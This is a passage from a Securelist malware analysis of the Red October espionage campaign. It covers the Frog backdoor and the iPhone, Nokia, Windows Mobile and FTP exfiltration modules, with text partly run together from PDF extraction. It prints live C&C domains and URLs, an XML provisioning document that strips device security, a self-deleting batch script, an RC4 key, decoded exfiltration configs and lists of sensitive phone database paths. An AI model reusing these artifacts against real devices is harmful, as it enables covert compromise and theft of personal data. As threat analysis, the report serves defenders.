HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapMenuConfigGrpsHKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapMenuConfigGrpsHKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapMenuConfigGrpsHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapMenuConfigGrps
It seems that MapMenuConfigGrps registry value doesn't exist on standard Windows system. We believe that this registrykey is set by a malicious module during operation and is used to store proxy server parameters.
After that, the module attempts to find %AppData%\adt.dat. Two variants are checked - common and user-specific, i.e.:
C:\Documents and Settings\All Users\Application Data C:\Documents and Settings\username\Application Data
The "adt.dat" file is an encrypted INI-file of known credentials of users in current domain and attacked organization. Whendecrypted this file looks like this:
[user] login = "%User1%"domain = "%Domain%"password = "%Password2%"admin = "1"[user]login = "%User2%"domain = "%Domain%"password = "%Password2%"admin = "1"
This information is checked against local domain controller to find active users with Admin privileges. Verified account isused for optional functionality to establish a NetBIOS connection with remote host to change remote registry. However, theonly setting that are changed is MapMenuConfigGrps value mentioned above. It is set to local parameters of system proxyserver which were acquired before.
Next procedure is to establish a SMB connection with %Target% and check if testsvc_00_name service is running. If it doesthe module uses Service Control Manager to stop the remote service. Then it copies Frog backdoor file embedded in AAAconfig/script to the remote path \\%Target%\ADMIN$\%SYSTEM%\testsvc_00.exe.
After that it starts the service using Service Control Manager and checks if the Frog backdoor successfully started byquerying its status over named pipe \\%Target%\pipe\net\NtControlListener or via direct TCP connection on port 4444.
Current module has some extra features that are not being used according to embedded config. In addition to function calledtask_da_svcinstall it has 3 others:
task_da_svcuninstall– to remove the installed Frog service and its file;task_da_svcstatus– to check the remote Frog service status via Service Control Manager;task_da_rem_proxy – transfer current proxy preferences to the remote host.
This module doesn't change local registry, nor does it created any local files.
After completing remote attack, the module sends logs to the C&C server. The connection options are retrieved from theconfiguration (resource):
Option name Description
D_CONN List of C&C domain names, separated by ';'
D_RPRT C&C server port
D_NAME Relative URL to send request to
The data send to the C&C server is compressed with Zlib and encrypted with a modified PKZIP stream cipher, and then it isBase64-encoded.
Frog moduleKnown variants:
MD5 Compilation date
595e29a21ecaa4dfcb3a5db18401a9a8 2012.05.28 08:56:10 (GMT)
SummaryThe file is a PE DLL file without two exported functions (ServiceMainand WinMessage), compiled with Microsoft VisualStudio 2010.
This module is used to backdoor current computer and is used in pair with remote exploit modules (i.e. ms_exploit). It iscapable of running arbitrary executable code by saving a file coming from another local machine or a C&C and starting it as anew process (EXE), loading it from disk to memory as a DLL or mapping it directly from memory and running in a "diskless"mode. It is designed to be lightweight module, which fits in 100Kb of data, doesn't create any logs and isn't linked with anyexternal libraries.
DllMainWhen loaded, the module retrieves its resource of type "BBB" and name "AAA". It decrypts the resource and parses configparameters. Unlike most of other modules, config parameters for this module has different format, it is not a script-like config,but plain binary structure with integer and string values.
ServiceMainIf current module is started by the system during Windows boot as a service, then ServiceMain function will be called by thesystem. The code in the function fetches Registry value from HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SvcHost\epvsvcs\AuthCapabilitis, if this value is not set it will be set right away. The value is 20 bytesbinary hash value of system dependent information (i.e. username, hostname). It is used as system ID.
After that the module creates three independent threads:
NamedPipeThread (server mode)This thread creates a named pipe \\.\pipe\net\NtControlListener (pipe name defined in the "AAA" config) and waits forincoming connections.TCPThread (server mode)This thread opens a listening TCP port 4444 (port number defined in the "AAA" config) and waits for incoming
connections.CnCThread (client mode)This thread sends a port requests to C&C server URL http://www.new-driver-upgrade.com/cgi-bin/frog (defined in "AAA"config), containing current system information, including current user name, computer name, local ip address, domainname, system ID and more, gets and interprets a response.
While NamedPipeThread and TCPThread work in server mode, which means that they are waiting for incoming clientconnections and requests, the last thread CnCThread actively connects to the C&C, uploads current system information andexpects a response. The logics of processing transmitted data for all threads are similar. They can either send out dataabout current system or receive and run an executable module. There are three variants of executables that these modulescan handle:
EXEThe received module is stored on disk in %TEMP%\system32uid.%Current Date and Time XORed with 0xA4F2%.tmpand started in a separate process with CreateProcess API.DLLThe received module is stored on disk in %TEMP%\system32uid.%Current Date and Time XORed with 0xA4F2%.tmpand loaded in current process with LoadLibrary API.PE-IN-MEMORYThe received module is kept in memory of current process using own PE file loader.
WinMessage functionThis function combines DllMain and ServiceMain functions excluding system service manager routines.
This module changes local registry and sets current system ID, as described above, it is also capable of creating local files. Itdoesn't make any local reports nor does it send execution logs to the C&C server. The only information sent to the C&Cserver is general system info during first stage of receiving and executing additional payload.
“Red October”. Detailed Malware Description 5. SecondStage of Attack - SecurelistИсточник: http://www.securelist.com/en/analysis/204792272/Red_October_Detailed_Malware_Description_5_Second_Stage_of_Attack
“Red October”. Detailed Malware Description 5. Second Stage of AttackFirst stage of attack
1. Exploits2. Dropper3. Loader Module4. Main component
Second stage of attack1. Modules, general overview2. Recon group3. Password group4. Email group5. USB drive group6. Keyboard group7. Persistence group8. Spreading group9. Mobile group
10. Exfiltration group
9. Mobile groupiPhone moduleKnown file location: %PROGRAMFILES%\Windows NT\iTunesNotifSrv.exe
Known variants:
MD5 Compilation date (encrypted) Compilation date (payload)
ee2e21a45a018c6faa68332a32c65ddd 2011.11.04 12:30:41 (GMT) 2011.11.04 10:19:11 (GMT)
339b8bc0f6e5ee4ca2bc2109f5de0b38 2011.11.21 12:07:46 (GMT) 2011.11.21 08:20:01 (GMT)
76e1d54a890befed31a369ce40b44ee6 2011.11.21 12:06:49 (GMT) 2011.11.21 08:20:01 (GMT)
The file is a PE EXE file, compiled with Microsoft Visual Studio 2010.
Creates event named "sdjvkbasyfvbalvjklas".
SummaryWrites encrypted log files:
%TMP%\iTunes_notification_%p.dat%TMP%\iTunes_ddsa_%p.tmp
where %p is derives from the result of GetTickCount() API function.
Log files are encrypted with a custom encryption algorithm based on AMPRNG.
When started, the module writes the following registry value to be executed each time Windows starts:
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iTunes Notification Service=%path to self% Then, it locates the ITunes mobile device DLL and "CoreFoundation.dll" and resolves the following API functions:
AMDeviceNotificationSubscribeAMRestoreRegisterForDeviceNotificationsAMDeviceConnectAMDeviceIsPairedAMDeviceValidatePairingAMDeviceStartSessionAMDeviceStartServiceAFCConnectionOpenAFCConnectionCloseAMDeviceCopyValueAFCDirectoryOpenAFCDirectoryReadAFCDirectoryCloseAFCFileInfoOpenAFCKeyValueReadAFCKeyValueCloseAFCFileRefOpenAFCFileRefReadAFCFileRefWriteAFCFileRefCloseAMDeviceDisconnect__CFStringMakeConstantString
If succeeded, the module calls AMDeviceNotificationSubscribe to set up own callback for the iOS deviceconnection/disconnection events.
In the Device notification callback function, the module logs each connection and disconnection event. When a device isconnected, it starts a new thread that manipulates this device.
Device connection threadThe module establishes a connection to the device using AMDeviceConnect, AMDeviceIsPaired, AMDeviceValidatePairingand finally, AMDeviceStartSession.
Then, it starts the following services on the device: "com.apple.afc2", "com.apple.afc".
The service "com.apple.afc2" is usually created when the device was jailbroken, so the module sets up a special flag if theservice was started successfully.
Then, it opens an Apple File Connection via the started service using AFCConnectionOpen.
The module reads device settings using AMDeviceCopyValue. The following settings are referenced by name:
UniqueDeviceIDDeviceClassDeviceNameModelNumberProductType
ProductVersionBuildVersionSerialNumberActivationStateSIMStatusInternationalMobileEquipmentIdentityInternationalMobileSubscriberIdentityIntegratedCircuitCardIdentityPhoneNumberWiFiAddressBluetoothAddressTimeZoneFirmwareVersionBasebandVersionBasebandBootloaderVersion
Also, it traverses the whole directory tree and stores the complete file listing in the log.
Then, it checks if device is jailbroken by
accessing the directory "/Applications" using AFCFileInfoOpenchecking if the service "com.apple.afc2" was started
The results are written in the log file.
Then, it builds a complete directory listing, starting from the root directory or “/private/var” (sampleee2e21a45a018c6faa68332a32c65ddd only). It also searches and retrieves all files with following extensions:
.jpg .jpeg.txt .doc .docx .xls .xlsx .ppt .pptx .dot .dotx .odt .djvu .odts .reg .rtf .zip .rar .pdf .7z .wab .pab .vcf .ost .wav .mp4
.m4a .amr .log .cer .em .msg .arc .key .pgp .gpg
Also, it tries to retrieve the contents of the following files:
/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb/private/var/mobile/Library/SMS/sms.db/private/var/mobile/Library/CallHistory/call_history.db/private/var/mobile/Library/Notes/notes.db/private/var/mobile/Library/Caches/locationd/consolidated.db/private/var/mobile/Library/Calendar/Calendar.sqlitedb/private/var/mobile/Library/Voicemail/voicemail.db/private/var/mobile/Library/Safari/History.plist/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000001.db/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000002.db/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000003.db/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000004.db/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000005.db/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000006.db/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000007.db/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000008.db/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000009.db/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000001.db/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000002.db/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000003.db/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000004.db
/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000005.db/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000006.db/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000007.db/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000008.db/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000009.db
Collected information including iOS device configuration variables, file listings and file contents is written to the file"%TMP%\iTunes_ddsa_%p.tmp". This file is encrypted and compressed with Zlib.
Log file formatThe log starts with a MAGIC number 0x5C63F935, then 0x14 bytes of 0xFF, DWORD length of header, header data, thenlog data.
The data consists of tagged records. The following tag values are known to us:
0x8002 Time/date0x8004 SHA1 of MAC address, System Volume Serial Number, IE Product ID, the same is written inHKCU,HKLM\SOFTWARE\Microsoft\ADOSoftware32, "ProductID"0x8005 Log ID / header0x8006 Log data
Compressed directory log starts with magic 0x5C63F934.
Nokia moduleKnown variants
MD5 Compilation date
6ebcb0b7f9cca7cecebbd683685cb705 2011.11.0211:42:09 (GMT)
SummaryPE Exe file compiled with Microsoft Visual C++ 2008.
Creates log file with "%TMP%\adobe_upd_imhbfex_%p_%p.dat" file name where %p depends on a result of GetTickCount()function.
It locates (SOFTWARE\PC Connectivity Solution\API\) and loads 'ConnAPI.dll' and 'DAAPI.dll' libraries (exits if unsuccessfuland writes to log "ERROR LOADING ConnAPI.dll: '%d'" and "EXITING…") followed by "SUCCESS LOADING ConnAPI.dll:'%d'\n'" string written to log file and time stamp.
Note: Each event which is written to a log file is followed up with time stamp which is written in a log file prepended by astring in the following format: [%04d-%02d-%02d %02d:%02d:%02d] (year-month-day hour-minute-second).
Writes to log "===========PROGRAM_STARTED_V_0.1=======" followed by time stamp.
Creates mutex with "sysvolumecheckasdfg" name and checks if program is already running. If yes, then it writes to log"PROGRAM IS ALREADY RUNNING - EXITING &" and exits.
Creates registry key SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup\%path_to_file%
It resolves the following API functions from ConnAPI.dll:
CONAAllocStringCONAAllocStringMBCONAFreeStringCONAAllocMemoryCONAFreeMemoryCONAOpenDMCONACloseDMCONASetDeviceListOptionCONAGetDeviceCountCONAGetDevicesCONAGetDeviceCONAFreeDeviceStructureCONARefreshDeviceListCONARenameFriendlyNameCONARegisterNotifyCallbackCONARegisterDMNotifyIFCONASearchDevicesCONAFreeConnectionInfoStructuresCONAChangeDeviceTrustedState
CONAGetDeviceInfoCONAFreeDeviceInfoStructureCONAModemConfigCONAFreeModemConfigDataCONAOpenFSCONACloseFSCONARegisterFSNotifyCallbackCONARegisterFSNotifyIFCONARefreshDeviceMemoryValuesCONAGetMemoryTypesCONAGetMemoryValuesCONASetCurrentFolderCONAGetCurrentFolderCONAFindBeginCONAFindNextFolderCONAFindNextFileCONAFindEndCONACreateFolderCONADeleteFolderCONARenameFolderCONAGetFolderInfoCONAMoveFolderCONACopyFolderCONAGetFileInfoCONADeleteFileCONAMoveFileCONACopyFileCONARenameFileCONAReadFileCONAWriteFileCONAReadFileInBlocksCONAWriteFileInBlocksCONACancelCONAFreeFileInfoStructureCONAFreeFolderInfoStructureCONAFreeFolderContentStructureCONAAllocFileDataMemoryCONAFreeFileDataMemoryCONAInstallApplicationCONAListApplicationsCONAUninstallApplicationCONAFreeApplicationInfoStructuresCONAConvertFileCONAGetConvertFileTypesCONAFreeConvertFileTypes
It resolves the following API functions from DAAPI.dll:
CAGetAPIVersionDAOpenCADACloseCACAGetFolderInfoCAFreeFolderInfoStructureCAGetIDListCAFreeIdListStructureCABeginOperationCAReadItemCAWriteItemCADeleteItemCAWriteFieldCADeleteFieldCACommitOperationsCAEndOperationCAFreeItemDataCARegisterNotifyCallbackCARegisterOperationCallback
If succeeded the module calls CONAOpenDM function which opens the device management connection and returns ahandle to the device management context. If succeeded a module calls CONARegisterNotifyCallback and to register acallback function for the device list notifications and writes to log "I AM WORKING...". If device was connected it starts a newthread to get information from the device.
The module uses CONARefreshDeviceList, CONASetDeviceListOption, CONAGetDeviceCount, CONAGetDevices andCONAGetDevice API functions to obtain a device which will be manipulated.
If a device was connected the module writes to log "!!!-------------- DEVICE ATTACHED: '%s'--------------- !!!".
It calls GetDeviceInfo function to get the following information about the connected device: type, name, software version,used language, synchronization support. A module also gets information about device memory, device model, IMEI number,device file system. Obtained information is written to the log file.
Messages:Extracts inbox, outbox, sent, archive messages, drafts, templates, SMS/MMS messages from user’s folders with statuses'SENT', 'UNREAD', 'READ', 'DRAFT', 'PENDING', 'DELIVERED', 'SENDING', or with undefined status 'UNDEFINEDMESSAGE_STATUS' or 'UNDEFINED FOLDER ID'. SMS and MMS messages are written separately to a log file.
Calendar:Extracts meetings, birthdays, memos, reminders, notes, 'To Do' lists with repetition attributes 'NONE', 'ILY' (I suppose itmeans 'DAILY' but authors must have mistyped), 'WEEKLY', 'MONTHLY', 'YEARLY' or 'Unknown'; with priority attributes'HIGH', 'NORMAL', 'LOW' or 'Unknown'; with action attributes 'NEEDS_ACTION', 'COMPLETED' or 'Unknown'; with alarmattributes 'NOT_SET', 'SILENT', 'WITH_TONE' or 'UNKNOWN'; with starting/ending time, subject, location and status. Themodule writes everything to a log file.
Contacts:Extracts all contacts with the following fields: ME, FROMAL_NAME, MIDDLE_NAME, ST_NAME, TITLE, SUFFIX,COMPANY, JOB_TITLE, BIRTHDAY, NICKNAME, GENERAL_NUMBER, HOME_NUMBER, WORK_NUMBER,PREF_NUMBER, R_NUMBER, GER_NUMBER, MOBILE_NUMBER, MOBILE_HOME_NUMBER,MOBILE_WORK_NUMBER, X_NUMBER, X_HOME_NUMBER, X_WORK_NUMBER, VIDEO_CALL_NUMBER,VOIP_NUMBER, VOIP_HOME_NUMBER, VOIP_WORK_NUMBER, POSTAL_ADRESS, BUSINESS_POSTAL_ADRESS,
HOME_POSTAL_ADRESS, EMAIL_ADRESS, HOME_EMAIL_ADRESS, WORK_EMAIL_ADRESS, WEB_ADRESS,HOME_WEB_ADRESS, WORK_WEB_ADRESS, PTT_ADRESS, VIDEO_ADRESS, SWISS_ADRESS. The module writeseverything to a log file.
Applications:Retrieve information about applications which have already been installed on a device. Also monitors if userinstalls/uninstalls any SIS/SISX/J2ME application. The module writes everything to a log file.
File types:Looks for files from root directory (txt, cdb, doc, docx, xls, xlsx, ppt, pptx, dot, dotx, odt, djvu, odts, reg, rtf, zip, rar, pdf, 7z,wab, pab, vcf, ost, jpg, waw, mp4, m4a, amr, exe, log, cer, eml, msg, arc, key, pgp, gpg) and tries to retrieve them.
Modules for Windows MobileWindows filesKnown files
MD5 Compilation date (encrypted) 70bee4d4141e6d963aa72a0da08b6683 11:14:22, July 8, 201109b4f1e0c03d7dbdac402df4c0625167 15:52:36, October 19, 201070bee4d4141e6d963aa72a0da08b6683 (724992 bytes)
PE Exe file compiled with Microsoft Visual C++ 2005.
Creates log file in the following path '%%TMP%%\tmp_m.%p.%p.dat' where all information about the module's work will bewritten and writes 'Application starting, version 2.0.0.2, obj: %s'. Module uses the same time/date format as in the Nokiamodule ('year-month-date hours-minutes-seconds') after every new log entry.
Creates mutex "dfgber7t8234ytfndfugh5vndfuvh4".
Initialize RAPI.dll and following API functions:
CeSHCreateShortcutCeGetSpecialFolderPathCeFindCloseCeFindFirstFileCeRegEnumKeyExCeRegEnumValueCeWriteFileCeCreateFileCeReadFileCeCreateProcessCeCloseHandleCeDeleteFileCeGetLastErrorCeRegQueryValueExCeRegCloseKeyCeRegCreateKeyExCeRegSetValueExCeRegOpenKeyExCeRapiUninitCeRapiInitExCeRapiInit
After that it checks the ActiveSync version and writes information to a log file.
Creates event 'dfjsbnegisfgsafgdsgcxrte'.
Deletes 'ActiveSync Connection Service' value in 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run'. If the module wasn'table to delete this value it creates 'delex.bat' file in TMP folder:
:Repeatdel 'path_to_itself'if exist 'path_to_itself' goto Repeatdel "C:\DOCUME~1\'USER_NAME'\LOCALS~1\Temp\delex.bat"
And after that launches it.
Windows Mobile device thread
Module uses WaitForSingleObject API function and waits for a device to be connected. If device is connected then it writes'Device connected' to a log file and calls a subroutine which initializes a connection and gets information like devices' name,OS version, CLSID which is written to a log file.
The module also checks the associations (in a registry of a device) between certain file types and applications for these filetypes on a device and writes this information to a log file:
PDF (PDF viewer): pdf
WCELOAD (CAB file installer): cab
WMPLAYER (Windows Media Player): mp4, 3gp, amr, avi, wav, wma, wmv, asf, midi, aac, mp3d, mp3
IEXPLORE1 (Internet Explorer): res, wsp, file, https, ftp, http, url, ico, html, xml, xhtml, xsl
PPT (Pocket PowerPoint): ppt, pps, pptx, pptm, ppsx, ppsm
PIMG (Pocket image viewer): jfif, gif, png, bmp, jpg
PXL (Pocket Excel): pxl, pxt, xls, xlt, xlsx, xltx, xlsm, xltm
PWORD (Pocket Word): rtf, psw, dot, dotx, docx, docm, dotm, pwt, doc, txt
Working with Windows Mobile device
XML Provisioning
First the module tries to inject an XML provisioning document on a device.
Loads the provisioning doc on a device:
<wap-provisioningdoc> <characteristic type="SecurityPolicy"> <parm name="4119" value="16"/> <parm name="4101" value="222"/> <parm name="4102" value="1"/> <parm name="4097" value="1"/> <parm name="4123" value="1"/> <parm name="4122" value="1"/> </characteristic></wap-provisioningdoc>
4119 - This setting grants the system administrative privileges held by SECROLE_MANAGER to other security roles. Value'16' is User Authenticated role.
4101 - This setting indicates whether unsigned .cab files can be installed on the device. Value '222' indicates that only OEM,Operator, Manager, UserAuth, UserUnAuth, Operator-TPS can run unsigned .cab file.
4102 - This setting indicates whether unsigned applications are allowed to run on Windows Mobile devices. Value '1'indicates that unsigned applications are allowed to run on the device.
4097 - This setting restricts the access of remote applications that are using Remote API (RAPI) to implement ActiveSyncoperations on Windows Mobile devices. Value '1' indicates full access to ActiveSync is provided. RAPI calls are allowed toprocess without restrictions.
4123 - This setting specifies which security model is implemented on the device. Value '1' indicates that a one-tier securitymodel is enabled. A device with one-tier access focuses only on how an application should run based on whether theapplication is signed with a certificate in the device certificate store. There is no concern with permission restriction.
4122 - This setting indicates whether a user is prompted to accept or reject unsigned .cab, theme, .dll and .exe files. Value'1' indicates the user will not be prompted.
'Zakladka' and other modules injection
NB: all injected modules below are copied to '\Windows\' directory on a Windows Mobile device.
If XML provisioning doc was injected successfully the module tries to install the so-called 'Zakladka' module with'winupdate.dll' name.
After 'Zakladka', the module injects the 'winupdate.cab' file, which is a provisioning XML file in archive with a certificate inside.The certificate is encoded with Base64.
After 'winupdate.cab' module injects the 'winupdate.cfg' file, which is a configuration file that contains mobile country codeswith mobile network codes.
After 'winupdate.cfg' the module injects 'calc.exe' file, an application for removing other modules from Windows Mobiledevice.
The module then creates backup file '\Windows\winupdate.dat' with 'zakladka' and other Windows Mobile modules inside.The backup file is encrypted with RC4 and 'q12ioptyhednv347' key.
The module creates WinUpdate.exe ('\Windows' folder, 'zakladka' inside) and WinUpdate.lnk ('\Windows\StartUp' folder).
After 'calc.exe' the module injects consequentially 'word.exe', 'excel.exe', 'ppoint.exe', 'pdf_viewer.exe', 'wmplauer.exe','img.exe', 'iexplorer.exe', 'wceloader.exe' modules and changes file associations on the device. E.g. all Word files and othertext documents will be opened with 'word.exe', all images will be opened with 'img.exe', etc.
File 'pdf_viewer.exe' is an application for launching other Windows Mobile modules. After that it tries to launch'pdf_viewer.exe' on a Windows Mobile device using 'CeCreateProcess' API function from rapi.dll library.
09b4f1e0c03d7dbdac402df4c0625167 (393216 bytes)
PE Exe file compiled with Microsoft Visual C++ 2005.
Creates mutex 'dfgbsdfjvabufqgwiffuvh4'.
Creates log file '%%TMP%%\tmp_mu.%p.%p.dat' and writes to a log file, 'Updater started, Version 1.0.0.0 s'. The moduleuses the same time/date format as in the Nokia module ('year-month-date hours-minutes-seconds') after every new logentry.
Opens event 'dfjsbnegisfgsafgdsgcxrte'. Initializes RAPI.dll and following API functions:
CeRegEnumKeyExCeRegEnumValueCeWriteFileCeCreateFileCeReadFileCeCreateProcessCeCloseHandleCeDeleteFileCeGetLastErrorCeRegQueryValueExCeRegCloseKeyCeRegCreateKeyExCeRegSetValueExCeRegOpenKeyExCeRapiUninitCeRapiInitExCeRapiInit
Creates thread 'dfjssdfgsdffgdsgcxrte' and 'delex.bat' file in TMP folder (for deleting itself if the mutex hasn't been created orafter it finished its work):
:Repeatdel 'path_to_itself'if exist 'path_to_itself' goto Repeatdel "C:\DOCUME~1\'USER_NAME'\LOCALS~1\Temp\delex.bat"
Windows Mobile device thread
This module uses the WaitForSingleObject API function and waits for a device to be connected. If a device is connected thenit writes 'Device connected' to a log file and calls a subroutine which initializes a connection and gets information like thedevice's name, OS version, CLSID, all of which is written to a log file.
Injects 'Update.exe' file to '\Windows\' directory with 'Update.exe' name. After that it tries to launch a file on a Windows Mobiledevice using 'CeCreateProcess' API function from rapi.dll library.
Windows Mobile filesKnown variants
File name Internal name MD5 Compilation date "Size (in bytes) "
winupdate.dll zakladka 797541f87e2e3a9a0754a097772f3192 12:00:01, July 7, 2011 111944
calc.exe d41d8cd98f00b204e9800998ecf8427e 11:57:11,December 20, 2010 13824
excel.exe 93638cbba11d52b933d5da553048899e 11:57:10,December 20, 2010 7168
iexplorer.exe 06ff2157f98f312ceaa19cbef996660d 11:57:10,December 20, 2010 7168
img.exe 54c86037d2650630718180f24ce6f9d2 11:57:09,December 20, 2010 7168
pdf_viewer.exe 4af92c1758158644e50ddf32d9a74501 11:57:08,December 20, 2010 7168
powerpoint.exe e4c84caaf52b42d9615d2b35acda271a 11:57:09,December 20, 2010 7168
wceloader.exe 135eab2135cb589c655d75bc25921d8c 11:57:09,December 20, 2010 7168
wmplauer.exe da2ff3b983e24a49603d4ab61b0f05c3 11:57:09,December 20, 2010 7168
word.exe ea1e4cdf4072fd19fb97df2b7d88055a 11:57:08,December 20, 2010 7168
Update.exe 95914229c080a998b33d7dbcb199b231 14:01:15, October 19, 2010 59392
Backdoor component
File name: winupdate.dllInternal name: zakladka
PE Exe file compiled with Microsoft Visual C++ 2005
Creates log file '\Temp\tmp%p.dat'.
Module loads XML provisioning doc (see above in Windows Mobile module for Windows).
Module obtains MCC (Mobile Country Code) and MNC (Mobile Network Code) from winupdate.cfg file of infected device andwrites this information to a log file.
Module tries to send in a C&C interaction loop a POST request to win-check-update.com (if that domain is unavailable, itsends a request to mobile-update.com):
'POST %s HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 Content-Length: %d Host: %s'
As a response from a remote server, the module receives a file which is stored in \Windows\%u.exe file and executed.
C&Cs:
win-check-update.commobile-update.com
Eraser component
File name: calc.exePE Exe file compiled with Microsoft Visual C++ 2005
Creates process 'MobileCalculator.exe'. Decrypts file '\Windows\WinUpdate.dat' with 'q12ioptyhednv347' key. Deletes files'word.exe', 'excel.exe', 'ppoint.exe', 'img.exe', 'wmplauer.exe', 'iexplorer.exe', 'wceloader.exe', 'pdf_viewer.exe','WinUpdate.exe', from '\Windows' directory. Retrieves type and data from '\System\Explorer\Shell Folders\StartUp\' registrykey. Deletes 'WinUpdate.lnk' file.
Launcher components
File names: pdf_viewer.exe, word.exe, excel.exe, iexplorer.exe, img.exe, powerpoint.exe, wceloader.exe, wmplauer.exe
All files are compiled with PE Exe file compiled with Microsoft Visual C++ 2005.
After launch, the module tries to configure device with an XML provisioning document. All the values and fields in this XML (itis stored inside file) are the same as in Windows Mobile module for Windows.
After that it launches a Windows Mobile application wceload.exe (CAB installer) on a file winupdate.cab (previously uploadedto the device by Windows module to '\Windows' directory) with '/silent /noui'. These parameters make the installationcompletely hidden from user.
Creates a registry key 'Services\Windows Update\' and registers file '\Windows\winupdate.dll' as a service using the'RegisterService' API function (launches it).
Launches 'calc.exe' (Remover) file from '\Windows' directory. After that it launches legitimate applications (like pword.exe,pxl.exe, iexplore1.exe or others) which are associated with certain file types.
Updater component
File name: Update.exePE Exe file compiled with Microsoft Visual C++ 2005.
Module launches a Windows Mobile application wceload.exe (CAB installer) on a file '\Windows\cert.cab' with '/silent /noui'.These parameters make the installation absolutely hidden from user.
10. Exfiltration groupWNFTPSCAN moduleKnown variants:
MD5 Compilation date (payload)
8bcd66ce8904e87f5cdfc1ad5b071ccb 2012.09.05 07:02:32 (GMT)
931391d484ff56b0a142f64ee47aff88 2012.09.05 07:02:32 (GMT)
SummaryThe file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010. All the functionality isimplemented in the DllMain function.
This module is a simple non-interactive FTP client. It is used to go through all subdirectories on specified FTP server, usingcredentials specified in config/script stored in its resource section. The main purpose of this module is to make directorylistings, copy files of interest (JPG, DOC, PPT, XLS, EMF, PDF) which are smaller than 1 MB and not older than specifieddate. The module is also capable of checking if remote FTP directories are available for write-access, but this functionality iscurrently not used.
DllMainWhen loaded, the module retrieves its resource of type "BBB" and name "AAA", and starts an internal plugin framework. Themain function of the module is named "task_wnftpscan" and is registered in the framework. Then, it starts the frameworkmain loop, effectively parsing the resource data and executing the list of actions encoded in the resource.
The decoded resource data for the known sample can be represented as the following script:
SetOption(conn_a.VERSION_ID, [6] "51070")SetOption(conn_a.VER_SESSION_ID, %removed%)SetOption(conn_a.SEND_DELAY_TIME, [5] "2000")SetOption(conn_a.D_CONN, [65] "windowscheckupdate.com;windows-genuine.com;windowsonlineupdate.com")SetOption(conn_a.D_MODE, 0x0033)SetOption(conn_a.D_NAME, [15] "/cgi-bin/win/cab")SetOption(conn_a.D_PASS, 0x00)SetOption(conn_a.D_RPRT, [3] "80")SetOption(conn_a.D_SPRT, [3] "80")SetOption(conn_a.D_USER, [21] %removed% )SetOption(conn_a.J_CONN, [65] "windowscheckupdate.com;windows-genuine.com;windowsonlineupdate.com")SetOption(conn_a.J_MODE, 0x0033)SetOption(conn_a.J_NAME, [15] "/cgi-bin/win/wcx")SetOption(conn_a.J_PASS, 0x00)
SetOption(conn_a.J_RPRT, [3] "80")SetOption(conn_a.J_SPRT, [3] "80")SetOption(conn_a.J_USER, [21] %removed% )SetOption(ftp_host, %removed% )SetOption(ftp_port, %removed% )SetOption(ftp_user, %removed% )SetOption(ftp_pass, %removed% )SetOption(ftp_crdir, "0" )SetOption(ftp_getlist, "1" )SetOption(ftp_max_file_size, "1000000" )SetOption(ftp_min_file_size, "10" )SetOption(ftp_file_time, "2012-10-30 00:00:00" )SetOption(ftp_file_ac_re)SetOption(ftp_ac_re, ".*\.jpg" )SetOption(ftp_ac_re, ".*\.jpeg" )SetOption(ftp_ac_re, ".*\.doc" )SetOption(ftp_ac_re, ".*\.docx" )SetOption(ftp_ac_re, ".*\.txt" )SetOption(ftp_ac_re, ".*\.xls" )SetOption(ftp_ac_re, ".*\.xlsx" )SetOption(ftp_ac_re, ".*\.ppt" )SetOption(ftp_ac_re, ".*\.pptx" )SetOption(ftp_ac_re, ".*\.emf" )SetOption(ftp_ac_re, ".*\.pdf" )Call(task_wnftpscan)
Main function (task_wnftpscan)The config defines parameters for the method task_wnftpscan, which uses WinInet library functions to connect to remoteFTP server using parameters set in the config and iterate trough directories.
It uses PCRE library to check if remote file extensions. Config option ftp_getlist=1 makes the code log every directory listing.Option ftp_crdir is set to 0, which prevents the code from checking if write-access is available. If it was set to 1 in the config,then the module would try to create "tmp" subdirectory in every remote directory it goes in. There are max and min file sizeconstraints, set to 1MB and 10 bytes respectively.
Additionally there is a date constraint which is set to 2012-10-30, indicating the earliest date of interest. Seems that attackershave already fetched files before that date.
When writing to the in-memory logs the module prints a banner "FtpClient V4.0", which is probably an alternative name forthe module or the code was reused from some other project. In the end of work it adds "WMFTPSCAN END" to the log.
After collecting logs and fetching files in memory, the module compiles all data together, compresses using Zlib methods,encrypts, encodes with Base64 and uploads to one of the command and control servers specified in the config.
This module doesn't change registry, nor does it created any local files.
After completing FTP directory scanning and file retrieval, the module sends logs and collected files to the C&C server. Theconnection options are retrieved from the configuration (resource):
Option name Description
D_CONN List of C&C domain names, separated by ';'
D_RPRT C&C server port
D_NAME Relative URL to send request to
